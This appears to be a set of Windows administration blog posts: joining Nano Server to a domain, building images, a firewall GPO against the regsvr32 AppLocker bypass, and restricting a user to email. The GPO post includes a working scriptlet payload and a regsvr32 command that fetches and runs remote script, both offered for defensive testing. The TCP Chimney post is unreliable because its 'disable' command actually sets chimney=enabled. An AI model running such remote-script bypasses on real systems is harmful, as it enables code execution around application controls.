Join Nano Server to a Domain

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

To join my Windows Server 2016 Nano server to my test domain I used the djoin.exe (Domain Join) command.

From a domain controller, or server already joined to my domain, I run the following command.  This will create a file called NANOSERVERTP5 at the location I run the command.

(Change items hilighted in Red)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .NANOSERVERTP5

2016-04-28_010017

Copy the NANOSERVERTP5 file to C: on the Nano Server.  I temporarily enabled File and Sharing through the Firewall on the Nano Server in order to gain access to the Administrative share, so I could copy it to 192.168.100.50c$.

In order to enter into a remote Powershell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan).  I launched an administrative Powershell shell.  Also, make sure WinRM service is running on the machine you’ll be using (net start winrm).

(Change items hilighted in Red)

Set-Item WSMan:localhostClientTrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location that NANOSERVERTP5 file was copied to; in my case, C:NANOSERVERTP5.

djoin /requestodj /loadfile c:NANOSERVERTP5 /windowspath c:windows /localos

Create Nano Server Image

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting the following error:

2016-04-28_120004

Turns out that is because the documentation is not updated and instead of -GuestDrivers it now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:usersrkreiderdesktopnanobasePackages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$_ | select-string Description|Product Name|^Name :; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory
    Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627

Choose Program as the type of rule to create and click Next >

2016-04-27_111642

Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651

Choose Block as the action and click Next >

2016-04-27_111659

Apply it to all network locations.

2016-04-27_111717

Give the rule a name and possibly a description.

2016-04-27_111733

Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Disable Server 2008 TCP Chimney Offload

This content is 4 years old. Technology changes with time. Keep that in mind as you read this article.

TCP Chimney Offload is a networking technology that helps transfer the workload from the CPU to a network adapter during network data transfer. In Windows Server 2008, TCP Chimney Offload enables the Windows networking subsystem to offload the processing of a TCP/IP connection to a network adapter that includes special support for TCP/IP offload processing.

TCP Chimney Offload is available in all versions of Windows Server 2008 and Windows Vista. Both TCP/IPv4 connections and TCP/IPv6 connections can be offloaded if the network adapter supports this feature.

Disable TCP Chimney Offload from command line:

netsh int tcp set global chimney=enabled

The above command disables TCP Chimney Offload for the operating system.

Restrict Access to Only Email/OWA Access

This content is 4 years old. Technology changes with time. Keep that in mind as you read this article.

An existing user in a Windows domain was moving companies (to a parent company) that is not part of the infrastructure.  After the employee left his account was to be terminated but still be able to access email only, so no login/remote access to systems, computers on the network.

By disabling the account, this would prevent authentication for Exchange needs so I couldn’t do that.

Create a Security Group

I created a new Security Group, Email Only.

2014-08-06_092620

I added this specific user to the newly created Security Group.

2014-08-06_092640

Create a Group Policy

Next, I created a new Group Policy for the domain and applied it to the Computers OU.

Group Policy:  Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Deny Log on Locally

2014-08-06_092519

I modified Deny Log on Locally policy and added my newly created Security Group, Email Only.

2014-08-06_092818

Testing

To test functionality, I logged on as an administrator to a PC in the domain and ran gpupdate /force.  This updates the group policy on that computer.  Then I logged off and tried logging back on as the user that I added to the Security Distribution Group.  Login failed, so this worked.

Next, I tested OWA, Outlook Anywhere, and Outlook.  I was able to successfully authenticate and send/receive email without an issue.

Now this user has access to OWA and Outlook Anywhere or Outlook without the ability to log on locally to a computer in the domain.